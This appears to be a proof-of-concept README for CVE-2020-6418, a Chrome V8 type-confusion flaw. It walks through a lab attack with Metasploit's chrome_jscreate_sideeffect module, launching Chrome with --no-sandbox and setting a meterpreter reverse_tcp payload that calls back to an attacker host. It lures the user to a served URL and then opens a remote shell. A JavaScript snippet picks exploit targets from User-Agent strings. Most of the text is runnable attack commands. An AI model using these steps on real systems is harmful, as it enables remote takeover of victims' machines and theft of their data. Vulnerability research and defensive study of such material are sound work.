CVE-2020-6418 PoC — Google Chrome V8 Security Vulnerability

Associated Vulnerability
Title: Google Chrome V8 Security Vulnerability (CVE-2020-6418)
Description: Type confusion in V8 in Google Chrome prior to 80.0.3987.122 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.
Readme
# CVE-2020-6418
CVE-2020-6418 is a type confusion vulnerability in V8, the JavaScript engine of Google Chrome, affecting versions prior to 80.0.3987.122. A remote attacker who lures the victim to a crafted HTML page can trigger heap corruption and run code inside the renderer process; with Chrome's sandbox disabled, as in the setup below, that is enough to obtain a shell on the target device.

## Environment Requirements
1) Google Chrome, version prior to 80.0.3987.122.
```
Note: Google Chrome must be started with the sandbox disabled (--no-sandbox) for the exploit to succeed. The exploit only yields code execution inside the renderer process; with the sandbox enabled, a separate sandbox-escape bug would be needed to reach the operating system.
```
2) Metasploit Framework
3) OS: Any

### Exploit Set Up
1) Google Chrome v80.0.3987.87, a vulnerable build (offline installer) <br />
 https://www.neowin.net/news/google-chrome-800398787-offline-installer/
2) Windows 11 (target machine)
3) Kali Linux 2021.1 (attacker machine)
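Before pointing a browser at the exploit server, it is worth confirming from its User-Agent string that it is a Chrome build in the affected range and which module target (Windows or macOS) applies. The JavaScript below is an added example written for this page, not code from the PoC repository or from the Metasploit module (which performs its own target check); the sample User-Agent strings are constructed, and the version comparison assumes the fix landed exactly in 80.0.3987.122 as stated in the CVE description. Chromium-based browsers that carry their own version token (Edge, Opera) are deliberately rejected because their build numbers cannot be compared to Chrome's fix version, and Windows 11 is reported as "Windows NT 10.0" in the User-Agent just like Windows 10.

```javascript
// Added example for this page (not from the PoC repository or the Metasploit
// module): classify a browser by its User-Agent string as a CVE-2020-6418
// target. Run with: node ua_check.js

// Version in which Google fixed CVE-2020-6418 (from the CVE description).
const FIXED_VERSION = "80.0.3987.122";

// Compare two dotted version strings numerically, component by component.
// Returns -1, 0 or 1; a missing trailing component counts as 0.
function compareVersions(a, b) {
  const pa = a.split(".").map(Number);
  const pb = b.split(".").map(Number);
  const n = Math.max(pa.length, pb.length);
  for (let i = 0; i < n; i++) {
    const x = pa[i] || 0;
    const y = pb[i] || 0;
    if (x !== y) return x < y ? -1 : 1;
  }
  return 0;
}

// Extract the Chrome version and host OS from a User-Agent string.
// Returns null for non-Chrome browsers and for Chromium derivatives that add
// their own token (Edge, Opera, ...): their build numbers do not map onto
// Chrome's fix version, so they cannot be classified this way.
function parseChromeUA(ua) {
  const m = /Chrome\/(\d+(?:\.\d+){0,3})/.exec(ua);
  if (!m) return null;
  if (/\b(Edg|Edge|EdgA|OPR|YaBrowser|SamsungBrowser)\//.test(ua)) return null;
  let os = "other";
  if (/Windows NT/.test(ua)) os = "windows";      // Windows 10 and 11 both report NT 10.0
  else if (/Mac OS X/.test(ua) && !/iPhone|iPad/.test(ua)) os = "macos";
  else if (/Linux/.test(ua)) os = "linux";         // includes Android
  return { version: m[1], os };
}

// Map a User-Agent to the module's TARGET index (0 = Windows, 1 = macOS),
// or null when the build is patched or the OS is not one of the two targets.
function pickTarget(ua) {
  const info = parseChromeUA(ua);
  if (!info) return null;
  if (compareVersions(info.version, FIXED_VERSION) >= 0) return null; // patched
  if (info.os === "windows") return 0;
  if (info.os === "macos") return 1;
  return null;
}

// Constructed sample User-Agent strings (not captured from real traffic).
const SAMPLE_UAS = {
  vulnerableWindows: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36",
  vulnerableMac: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36",
  patchedWindows: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36",
  edgeOnChrome80: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36 Edg/80.0.361.50",
  firefox: "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0",
};

for (const [name, ua] of Object.entries(SAMPLE_UAS)) {
  console.log(name.padEnd(18), "->", pickTarget(ua));
}
```

The same check is useful on the defensive side: run over proxy or web-server logs, `pickTarget` flags clients that were still on an affected Chrome build at the time of the request.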

## Google Chrome Set-Up with no sandbox
i) Create a shortcut for Google Chrome <br />
ii) Right-click the shortcut > Properties > find the field called "Target" <br />
iii) At the end of the path to chrome.exe, add a space followed by --no-sandbox (two leading hyphens) <br />
iv) Click Apply > OK <br />
v) Launch Google Chrome from the shortcut; a warning bar will appear stating the following.
```
You are using an unsupported command-line flag: --no-sandbox. Stability and security will suffer.
```
### Demonstration to Disable Sandbox
https://user-images.githubusercontent.com/49935118/159386732-dc812ab2-f22e-4eb4-9585-4783a55b6706.mp4

## Using Metasploit
Since we are using Kali as the environment to carry out the exploit, Metasploit comes pre-installed with the distro. On other distros, Metasploit needs to be installed before we begin the exploit.

Refer to the **Metasploit installation** documentation for further details.

## Performing the exploit 
i) Start the Metasploit Framework
```
> msfconsole
```
ii) Find the exploit 
```
> search chrome_js
```
iii) Use the exploit module from the above output
```
> use exploit/multi/browser/chrome_jscreate_sideeffect
```
iv) Provide the SRVHOST IP address (the attacker interface that the target browser can reach)
```
> set SRVHOST <ip address>
```
v) Provide the target 
   Here we get two options 
   1) Target 0: Windows 
   2) Target 1: macOS
```
> set TARGET <number>
```
vi) Provide the payload. For a reverse_tcp payload, also set LHOST if the default shown by `show options` is not an address the target can reach; for the macOS target, use an osx/x64 payload instead of a windows one.
```
> set PAYLOAD windows/x64/meterpreter/reverse_tcp
> set LHOST <ip address>
```
vii) Check the current settings and enabled options
```
> show options
```
viii) Run the exploit 
```
> run (or) > exploit
```
ix) You will be provided with a URL, which must be opened in the target browser for the session to become active.

x) Once the user accesses the URL, a session is created. To list sessions 
```
> sessions -l
```
xi) Using the session, we can check the target's system info or drop into a shell.
```
> sessions -i <number>
> shell
```
### Demonstration to exploit

https://user-images.githubusercontent.com/49935118/159605013-d6033f7f-8fcc-4617-8f8e-6b909a5aebe6.mp4